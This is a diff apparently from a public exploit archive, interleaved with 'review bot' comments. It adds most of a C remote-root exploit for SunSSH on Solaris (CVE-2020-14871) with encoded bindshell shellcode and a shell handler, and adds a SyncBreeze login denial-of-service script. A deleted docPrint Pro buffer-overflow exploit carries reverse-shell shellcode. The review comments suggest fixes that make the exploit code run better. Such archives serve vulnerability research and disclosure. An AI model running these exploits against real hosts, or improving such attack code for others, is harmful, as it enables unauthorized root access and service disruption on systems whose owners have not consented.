+        "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
+        "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+        "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+        "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+        "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+        "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+        "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+        "\xb1\x3a\xfe\xd7\x2a\x95"},
+	{"Solaris x86 bindshell tcp port 8080",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+	"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
+	"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
+	"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+	"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+	"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+	"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+	"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+	"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+	"\xb1\x3a\xfe\xd7\x44\x60"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ 
+	{"Solaris 11.0 x86 bindshell tcp port 9999", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+	"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
+	"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
+	"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
+	"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
+	"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
+	"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
+	"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
+	"\x9f\x56\x1b\x2c\xdf\x8f"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
+	{"Solaris 11.0 x86 bindshell tcp port 4444", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+	"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
+	"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
+	"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
+	"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
+	"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
+	"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
+	"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
+	"\x0a\x39\x6b\xeb\x53\x6b"}
+};
+
+void spawn_shell(int sd) {
+#define sockbuflen 2048
+	int rcv;
+	char sockbuf[sockbuflen];
+	fd_set readfds;
+	memset(sockbuf,0,sockbuflen);
+	snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
+	write(sd,sockbuf,strlen(sockbuf));
+	while (1) {
+		FD_ZERO(&readfds);
+		FD_SET(0,&readfds);
+		FD_SET(sd,&readfds);
+		select(255,&readfds,NULL,NULL,NULL);
+		if (FD_ISSET(sd, &readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			rcv = read(sd,sockbuf,sockbuflen);
+			if (rcv <= 0) {
+              			printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
+              			exit(-1);
+            		}
+			printf("%s",sockbuf);
+			fflush(stdout);
+		}
+      		if(FD_ISSET(0,&readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			read(0,sockbuf,sockbuflen);
+			write(sd,sockbuf,strlen(sockbuf));
+        	}
+    	}
+}
+
+void bindshell_setup(short port){
+	oldsd = sd;
+        sd = socket(AF_INET,SOCK_STREAM,0);
+        sain.sin_port = htons(port);
+        if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
+		printf("[!] fatal bind shell failed\n\e[0m");
+                exit(-1);
+        }
+	printf("[-] connected.. enjoy :)\e[0m\n");
+        spawn_shell(sd);
+}
+
+void on_alarm(int signum){
+	printf("[+] exploit success, handling payload...\n");
+	if(ishell==0||ishell==2){
+		bindshell_setup(9999);
+	}
+	if(ishell==1||ishell==3){
+		bindshell_setup(8080);
+	}
+	printf("[-] exploit complete\n\e[0m");
+	exit(0);
+}
+
+void on_interrupt(int signum){
+	printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
+	if(sd){
+		close(sd);
+	}
+	if(oldsd){
+		close(oldsd);
+	}
+	exit(0);
+}
+
+void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
+#define payload_size 4096
+	int len = strlen(payload);
+	buf = malloc(payload_size);
+	char randchar = 'A';
+	char* randbuf = malloc(2);
+	if(!buf||!randbuf){
+		printf("[!] fatal payload buffer error\n");
+		exit(-1);
+	}
+	srand(time(NULL));
+	memset(buf,'\x00',payload_size);
+	memset(randbuf,0,2);
+	printf("[-] shellcode length %d bytes\n",len);
+	if(len < 512 && payload_size > 1024){
+		memcpy(buf,payload,len);
+		for(int i =0;i <= (512 - len);i++){
+ 			randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
+			memcpy(randbuf,&randchar,1);
+			strcat(buf,randbuf);
+		}
+		len = strlen(retaddr);
+		printf("[-] rop chain length %d\n",len);
+		if(len + 512 < payload_size){
+			memcpy((void*)(long)buf+512,(void*)retaddr,len);
+			len = strlen(buf);
+			printf("[-] exploit buffer length %d\n",len);
+		}
+		else{
+			printf("[!] exploit buffer miscalculated\n");
+			exit(-1);
+		}
+	}
+	else{
+		printf("[!] exploit buffer miscalculated\n");
+		exit(-1);
+	}
+}
+
+static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
+	int i = 0;
+	signal(SIGALRM, &on_alarm);
+	printf("[+] entering keyboard-interactive authentication.\n");
+	printf("[-] number of prompts: %d\n", num_prompts);
+	printf("[-] prompt %d from server: '", i);
+	fwrite(prompts[i].text, 1, prompts[i].length, stdout);
+	printf("'\n");
+	prepare_payload();
+	//uncomment to pause for gdb debugging
+	//sleep(10);
+	responses[i].text = strdup(buf);
+	responses[i].length = strlen(buf);
+	printf("[-] sending exploit magic buffer... wait\n");
+	alarm(5);
+}
+
+int main(int argc,char **argv){
+	int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
+	char* host;
+	int i, type, exitcode;
+	unsigned long hostaddr;
+	const char *fingerprint;
+	LIBSSH2_SESSION *session;
+	LIBSSH2_CHANNEL *channel;
+	char *exitsignal = (char *)"none";
+	size_t len;
+	LIBSSH2_KNOWNHOSTS *nh;
+	static struct option options[] = {
+		{"server", 1, 0, 's'},
+		{"port", 1, 0, 'p'},
+		{"target", 1, 0, 't'},
+		{"shellcode", 1, 0, 'x'},
+		{"help", 0, 0,'h'}
+        };
+	printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
+	while(rc != -1) {
+	        rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
+        	switch(rc) {
+               		case -1:
+	                        break;
+        	        case 's':
+				if(ihost==0){
+					host = malloc(strlen(optarg) + 1);
+					if(host){
+						sprintf(host,"%s",optarg);
+						ihost = 1;
+					}
+				}
+               			break;
+	                case 'p':
+				port = atoi(optarg);
+                	        break;
+			case 'x':
+				if(ishell==-1) {
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 1:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 2:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 3:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+
+						default:
+							printf("[!] Invalid shellcode selection %d\n",rc);
+							exit(0);
+							break;
+						}
+				}
+				break;
+	                case 't':
+				if(itarg==0){
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 1:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 2:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 3:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 4:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						default:
+							printf("[!] Invalid target selection %d\n", rc);
+							exit(0);
+							break;
+					}
+					itarg = 1;
+				}
+        	                break;
+			case 'h':
+				printf("[!] Usage instructions.\n[\n");
+				printf("[ %s <required> (optional)\n[\n[   --server|-s <ip/hostname>\n",argv[0]);
+				printf("[   --port|-p (port)[default 22]\n[   --target|-t <target#>\n");
+				printf("[   --shellcode|-x <shellcode#>\n[\n");
+				printf("[ Target#'s\n");
+				for(i = 0;i <= targetno - 1;i++){
+					printf("[ %d \"%s\"\n",i,targets[i]);
+				}
+				printf("[\n[ Shellcode#'s\n");
+				for(i = 0;i <= shellno - 1;i++){
+					printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
+				}
+				printf("\e[0m");
+				exit(0);
+				break;
+			default:
+                		break;
+	        }
+	}
+	if(itarg != 1 || ihost  != 1 || ishell < 0){
+		printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
+		exit(-1);
+	}
+	rc = libssh2_init(0);
+	hostaddr = inet_addr(host);
+	sd = socket(AF_INET, SOCK_STREAM, 0);
+	sain.sin_family = AF_INET;
+	sain.sin_port = htons(port);
+	sain.sin_addr.s_addr = hostaddr;
+	if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
+		fprintf(stderr, "[!] failed to connect!\n");
+		goto shutdown;
+	}
+	session = libssh2_session_init();
+	libssh2_session_set_blocking(session, 1);
+	while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
+	if(rc) {
+		printf("[!] failure establishing ssh session: %d\n", rc);
+		goto shutdown;
+	}
+	nh = libssh2_knownhost_init(session);
+	if(!nh) {
+		printf("[!] failure on libssh2 init\n");
+		goto shutdown;
+	}
+	fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
+	printf("[+] ssh host fingerprint: ");
+	for(i = 0; i < 20; i++) {
+		printf("%02x", (unsigned char)fingerprint[i]);
+	}
+	printf("\n");
+	libssh2_knownhost_free(nh);
+	signal(SIGINT,&on_interrupt);
+	libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
+	printf("[!] exploit failed, core maybe on target!\n");
+shutdown:
+	if(sd){
+		close(sd);
+	}
+	printf("\e[0m");
+	return -2;
+}
\ No newline at end of file
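Review bot: In the `--help` branch of `main`, `printf("[ %d \"%s\"\n",i,targets[i]);` passes a whole `struct target` where `%s` expects a `char*`, which is undefined behaviour; it should read `printf("[ %d \"%s\"\n",i,targets[i].name);`. The descriptor checks in `on_interrupt` and at the `shutdown:` label use `if(sd)` / `if(oldsd)`, but both globals start at -1, so an unopened descriptor still reaches `close()` while descriptor 0 would be skipped; `if(sd >= 0)` matches the sentinel. The forward declaration is spelled `on_interupt` while the definition is `on_interrupt`, so the prototype names a function that is never defined. The `%d` conversions that print `strlen()` results should be `%zu`, since `strlen` returns `size_t`.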
diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py
deleted file mode 100755
index acf6c7333..000000000
--- a/exploits/windows/local/48719.py
+++ /dev/null
@@ -1,99 +0,0 @@
-# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
-# Date: 2020-07-26
-# Exploit Author: MasterVlad
-# Vendor Homepage: http://www.verypdf.com
-# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
-# Version: 8.0
-# Vulnerability Type: Local Buffer Overflow
-# Tested on: Windows 7 32-bit
-
-# Proof of Concept:
-
-# 1. Run the python script
-# 2. Open exploit.txt and copy the content to clipboard
-# 3. Open doc2pdf_win.exe and go to File -> Add URL
-# 4. Paste the clipboard into the field and click on Ok
-
-#!/usr/bin/python
-
-# encoded egghunter
-egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
-egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
-
-# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
-
-buf =  ""
-buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
-buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
-buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
-buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
-buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
-buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
-buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
-buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
-buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
-buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
-buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
-buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
-buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
-buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
-buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
-buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
-buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
-buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
-buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
-buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
-buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
-buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
-buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
-buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
-buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
-buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
-buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
-buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
-buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
-buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
-buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
-buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
-buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
-buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
-buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
-buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
-buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
-buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
-buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
-buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
-buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
-buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
-buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
-buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
-buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
-buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
-buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
-buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
-buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
-buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
-buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
-buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
-buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
-
-exploit = "A"*3876
-exploit += "\x74\x06\x75\x04"
-# 0x1001062d - pop pop ret - reg.dll
-exploit += "\x2d\x06\x01\x10"
-exploit += egg
-exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
-exploit += "T00WT00W"
-exploit += buf
-
-f = open("exploit.txt", "w")
-f.write(exploit)
-f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
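Review bot: The closing sentence says code would run "during startup or reboot", but the `sc qc` output above it shows `START_TYPE : 3 DEMAND_START`, so the service is started on demand rather than at boot; the sentence should read `This vulnerability could permit executing code with escalated privileges when the service is started.` The write-up also never states what makes the configuration a problem: `BINARY_PATH_NAME` contains spaces and is not enclosed in quotes, while `SERVICE_START_NAME` is `LocalSystem`. A remediation line would help readers on the defending side, for example `# Fix: enclose the service's binary path in double quotes in its configuration.`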
diff --git a/exploits/windows/webapps/49291.py b/exploits/windows/webapps/49291.py
new file mode 100755
index 000000000..89aa8b74c
--- /dev/null
+++ b/exploits/windows/webapps/49291.py
@@ -0,0 +1,33 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)
+# Data: 18-Dec-2020
+# Exploit Author: Ahmed Elkhressy
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7, Windows 10
+
+#!/usr/bin/python
+import socket
+
+host="192.168.1.9"
+payload = 'A' *1000
+request = ""
+request += "POST /login HTTP/1.1\r\n"
+request += "Host: "+host+"\r\n"
+request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
+request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
+request += "Accept-Language: en-US,en;q=0.5\r\n"
+request += "Accept-Encoding: gzip, deflate\r\n"
+request += "Content-Type: application/x-www-form-urlencoded\r\n"
+request += "Content-Length: 27\r\n"
+request += "Origin: http://"+host+"\r\n"
+request += "Connection: keep-alive\r\n"
+request += "Referer: http://"+host+"/login"+payload+"\r\n"
+request += "Upgrade-Insecure-Requests: 1\r\n"
+request += "\r\n"
+request += "username=test&password=test"
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, 80))
+s.send(request)
+print s.recv(1024)
+s.close
\ No newline at end of file
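Review bot: The last line, `s.close`, only references the method and never calls it, so the socket is left for the interpreter to reclaim; it should be `s.close()`. `print s.recv(1024)` is Python 2 syntax, so the script runs only under Python 2, and the header comment should say so. The `#!/usr/bin/python` line sits on the ninth line of the file, where it is an ordinary comment rather than a shebang. A one-line comment such as `# the oversized value is carried in the Referer header of POST /login` would tell a reader reviewing server logs what the request looks like.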
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..5a2671797 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6765,6 +6765,7 @@ id,file,description,date,author,type,platform,port
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
